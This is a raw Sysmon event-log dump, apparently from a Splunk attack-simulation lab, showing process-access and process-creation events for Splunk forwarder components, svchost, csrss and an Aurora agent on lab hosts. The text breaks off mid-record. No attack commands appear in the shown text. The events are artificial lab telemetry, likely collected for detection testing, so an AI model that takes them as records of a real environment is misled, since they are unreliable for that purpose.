AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016400Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:33.228{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77FBF1612D11FEF6BCA16F5F5FBAA58E,SHA256=D9665C2A60A6F1C5A3A8837D2C0328AECD3AE116951C5383F33A6E57E9C9DE69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.312{FE4C2B44-E44D-63C7-2506-00000000AF02}53803936C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E44D-63C7-2506-00000000AF02}5380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E44D-63C7-2506-00000000AF02}5380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E44D-63C7-2506-00000000AF02}5380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:33.128{FE4C2B44-E44D-63C7-2506-00000000AF02}5380C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016399Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:33.034{E5A8D418-E44C-63C7-0102-00000000B002}34603608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016414Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E44E-63C7-0202-00000000B002}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016413Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016412Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016411Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016410Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016409Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016408Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016407Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016406Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016405Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016404Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E44E-63C7-0202-00000000B002}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016403Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E44E-63C7-0202-00000000B002}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016402Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.369{E5A8D418-E44E-63C7-0202-00000000B002}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016401Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:34.337{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=238B846B0A3587AEE49C2993A9AF8707,SHA256=8E501BE1B195E34E2A2571A894A121E409581A0461AF2946F3D2D6C97FC94E18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.835{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.834{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 10341000x800000000000000041755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:34.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 